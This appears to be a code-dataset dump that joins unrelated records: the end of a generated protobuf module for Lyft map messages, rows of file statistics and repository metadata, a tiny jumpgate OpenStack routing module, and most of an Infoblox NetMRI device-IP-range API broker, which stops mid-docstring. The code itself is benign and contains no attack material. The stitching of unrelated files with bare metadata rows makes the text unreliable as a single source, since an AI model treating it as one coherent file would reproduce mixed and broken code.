_sym_db.RegisterMessage(SegmentSequence.SegmentWithOrientation)
LaneSequence = _reflection.GeneratedProtocolMessageType('LaneSequence', (_message.Message,), {
'DESCRIPTOR' : _LANESEQUENCE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LaneSequence)
})
_sym_db.RegisterMessage(LaneSequence)
LaneSequences = _reflection.GeneratedProtocolMessageType('LaneSequences', (_message.Message,), {
'DESCRIPTOR' : _LANESEQUENCES,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LaneSequences)
})
_sym_db.RegisterMessage(LaneSequences)
Polygon = _reflection.GeneratedProtocolMessageType('Polygon', (_message.Message,), {
'DESCRIPTOR' : _POLYGON,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Polygon)
})
_sym_db.RegisterMessage(Polygon)
MultiPolygon = _reflection.GeneratedProtocolMessageType('MultiPolygon', (_message.Message,), {
'DESCRIPTOR' : _MULTIPOLYGON,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MultiPolygon)
})
_sym_db.RegisterMessage(MultiPolygon)
AnnotatedShape = _reflection.GeneratedProtocolMessageType('AnnotatedShape', (_message.Message,), {
'Building' : _reflection.GeneratedProtocolMessageType('Building', (_message.Message,), {
'DESCRIPTOR' : _ANNOTATEDSHAPE_BUILDING,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape.Building)
})
,
'Region' : _reflection.GeneratedProtocolMessageType('Region', (_message.Message,), {
'DESCRIPTOR' : _ANNOTATEDSHAPE_REGION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape.Region)
})
,
'DESCRIPTOR' : _ANNOTATEDSHAPE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape)
})
_sym_db.RegisterMessage(AnnotatedShape)
_sym_db.RegisterMessage(AnnotatedShape.Building)
_sym_db.RegisterMessage(AnnotatedShape.Region)
LatLngBox = _reflection.GeneratedProtocolMessageType('LatLngBox', (_message.Message,), {
'DESCRIPTOR' : _LATLNGBOX,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LatLngBox)
})
_sym_db.RegisterMessage(LatLngBox)
MapElement = _reflection.GeneratedProtocolMessageType('MapElement', (_message.Message,), {
'Element' : _reflection.GeneratedProtocolMessageType('Element', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_ELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.Element)
})
,
'AssociatedConditions' : _reflection.GeneratedProtocolMessageType('AssociatedConditions', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_ASSOCIATEDCONDITIONS,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.AssociatedConditions)
})
,
'DebugInfoEntry' : _reflection.GeneratedProtocolMessageType('DebugInfoEntry', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_DEBUGINFOENTRY,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.DebugInfoEntry)
})
,
'DESCRIPTOR' : _MAPELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement)
})
_sym_db.RegisterMessage(MapElement)
_sym_db.RegisterMessage(MapElement.Element)
_sym_db.RegisterMessage(MapElement.AssociatedConditions)
_sym_db.RegisterMessage(MapElement.DebugInfoEntry)
MapFragment = _reflection.GeneratedProtocolMessageType('MapFragment', (_message.Message,), {
'DESCRIPTOR' : _MAPFRAGMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapFragment)
})
_sym_db.RegisterMessage(MapFragment)
DESCRIPTOR._options = None
_MAPELEMENT_DEBUGINFOENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 53.285281 | 19,827 | 0.783772 | 24,508 | 193,319 | 5.792843 | 0.037253 | 0.040234 | 0.077621 | 0.064851 | 0.814723 | 0.786266 | 0.75066 | 0.71204 | 0.689704 | 0.666685 | 0 | 0.035485 | 0.104206 | 193,319 | 3,627 | 19,828 | 53.299972 | 0.784333 | 0.013946 | 0 | 0.662921 | 1 | 0.013253 | 0.21778 | 0.172785 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001729 | 0 | 0.001729 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3c484acaa3457c3490586556b513e0a0e8b7f33 | 134 | py | Python | jumpgate/compute/drivers/openstack.py | Neetuj/jumpgate | 509c1d43a5f4b91c7f3ad5c0cd34abf61bb0a3ee | [
"MIT"
] | null | null | null | jumpgate/compute/drivers/openstack.py | Neetuj/jumpgate | 509c1d43a5f4b91c7f3ad5c0cd34abf61bb0a3ee | [
"MIT"
] | null | null | null | jumpgate/compute/drivers/openstack.py | Neetuj/jumpgate | 509c1d43a5f4b91c7f3ad5c0cd34abf61bb0a3ee | [
"MIT"
] | null | null | null | from jumpgate.common.openstack import setup_responder
def setup_routes(app, disp):
return setup_responder(app, disp, 'compute')
| 22.333333 | 53 | 0.783582 | 18 | 134 | 5.666667 | 0.722222 | 0.27451 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126866 | 134 | 5 | 54 | 26.8 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0.052239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a3cfb681f41da7cc450714937cdfd207d76c804a | 49,326 | py | Python | infoblox_netmri/api/broker/v3_8_0/device_ip_range_broker.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/broker/v3_8_0/device_ip_range_broker.py | azinfoblox/infoblox-netmri | 02372c5231e2677ab6299cb659a73c9a41b4b0f4 | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/broker/v3_8_0/device_ip_range_broker.py | azinfoblox/infoblox-netmri | 02372c5231e2677ab6299cb659a73c9a41b4b0f4 | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..broker import Broker
class DeviceIpRangeBroker(Broker):
controller = "device_ip_ranges"
def show(self, **kwargs):
"""Shows the details for the specified device ip range.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_range: The device ip range identified by the specified DeviceIPRangeID.
:rtype device_ip_range: DeviceIpRange
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available device ip ranges. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which belongs this flow.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for the service to which belongs this flow.
:type DeviceObjectID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available device ip ranges matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which belongs this flow.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for ip address range definition.
:type DeviceIPRangeID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for the service to which belongs this flow.
:type DeviceObjectID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprChangedCols: The fields that changed between this revision of the record and the previous revision.
:type IprChangedCols: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprDisplayText: The text that was defined in the configuration for this ip address range.
:type IprDisplayText: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprEndTime: The ending effective time of this record, or empty if still in effect.
:type IprEndTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprFirstSeenTime: The timestamp of when NetMRI saw for the first time this flow.
:type IprFirstSeenTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPNumericMax: The numeric value for the range max value.
:type IprIPNumericMax: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPNumericMin: The numeric value for the range min value.
:type IprIPNumericMin: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPVersion: The ip version for this range. 4 or 6.
:type IprIPVersion: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprStartTime: The starting effective time of this record.
:type IprStartTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprTimestamp: The date and time this record was collected or calculated.
:type IprTimestamp: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device ip ranges, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceID, DeviceIPRangeID, DeviceObjectID, IprChangedCols, IprDisplayText, IprEndTime, IprFirstSeenTime, IprIPNumericMax, IprIPNumericMin, IprIPVersion, IprStartTime, IprTimestamp.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available device ip ranges matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceID, DeviceIPRangeID, DeviceObjectID, IprChangedCols, IprDisplayText, IprEndTime, IprFirstSeenTime, IprIPNumericMax, IprIPNumericMin, IprIPVersion, IprStartTime, IprTimestamp.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device to which belongs this flow. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceIPRangeID: The operator to apply to the field DeviceIPRangeID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPRangeID: The internal NetMRI identifier for ip address range definition. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPRangeID: If op_DeviceIPRangeID is specified, the field named in this input will be compared to the value in DeviceIPRangeID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPRangeID must be specified if op_DeviceIPRangeID is specified.
:type val_f_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPRangeID: If op_DeviceIPRangeID is specified, this value will be compared to the value in DeviceIPRangeID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPRangeID must be specified if op_DeviceIPRangeID is specified.
:type val_c_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceObjectID: The operator to apply to the field DeviceObjectID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceObjectID: The internal NetMRI identifier for the service to which belongs this flow. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceObjectID: If op_DeviceObjectID is specified, the field named in this input will be compared to the value in DeviceObjectID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_f_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceObjectID: If op_DeviceObjectID is specified, this value will be compared to the value in DeviceObjectID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_c_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprChangedCols: The operator to apply to the field IprChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprChangedCols: If op_IprChangedCols is specified, the field named in this input will be compared to the value in IprChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprChangedCols must be specified if op_IprChangedCols is specified.
:type val_f_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprChangedCols: If op_IprChangedCols is specified, this value will be compared to the value in IprChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprChangedCols must be specified if op_IprChangedCols is specified.
:type val_c_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprDisplayText: The operator to apply to the field IprDisplayText. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprDisplayText: The text that was defined in the configuration for this ip address range. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprDisplayText: If op_IprDisplayText is specified, the field named in this input will be compared to the value in IprDisplayText using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprDisplayText must be specified if op_IprDisplayText is specified.
:type val_f_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprDisplayText: If op_IprDisplayText is specified, this value will be compared to the value in IprDisplayText using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprDisplayText must be specified if op_IprDisplayText is specified.
:type val_c_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprEndTime: The operator to apply to the field IprEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprEndTime: If op_IprEndTime is specified, the field named in this input will be compared to the value in IprEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprEndTime must be specified if op_IprEndTime is specified.
:type val_f_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprEndTime: If op_IprEndTime is specified, this value will be compared to the value in IprEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprEndTime must be specified if op_IprEndTime is specified.
:type val_c_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprFirstSeenTime: The operator to apply to the field IprFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprFirstSeenTime: The timestamp of when NetMRI saw for the first time this flow. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprFirstSeenTime: If op_IprFirstSeenTime is specified, the field named in this input will be compared to the value in IprFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprFirstSeenTime must be specified if op_IprFirstSeenTime is specified.
:type val_f_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprFirstSeenTime: If op_IprFirstSeenTime is specified, this value will be compared to the value in IprFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprFirstSeenTime must be specified if op_IprFirstSeenTime is specified.
:type val_c_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPNumericMax: The operator to apply to the field IprIPNumericMax. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPNumericMax: The numeric value for the range max value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprIPNumericMax: If op_IprIPNumericMax is specified, the field named in this input will be compared to the value in IprIPNumericMax using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPNumericMax must be specified if op_IprIPNumericMax is specified.
:type val_f_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPNumericMax: If op_IprIPNumericMax is specified, this value will be compared to the value in IprIPNumericMax using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPNumericMax must be specified if op_IprIPNumericMax is specified.
:type val_c_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPNumericMin: The operator to apply to the field IprIPNumericMin. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPNumericMin: The numeric value for the range min value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprIPNumericMin: If op_IprIPNumericMin is specified, the field named in this input will be compared to the value in IprIPNumericMin using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPNumericMin must be specified if op_IprIPNumericMin is specified.
:type val_f_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPNumericMin: If op_IprIPNumericMin is specified, this value will be compared to the value in IprIPNumericMin using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPNumericMin must be specified if op_IprIPNumericMin is specified.
:type val_c_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPVersion: The operator to apply to the field IprIPVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPVersion: The ip version for this range. 4 or 6. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
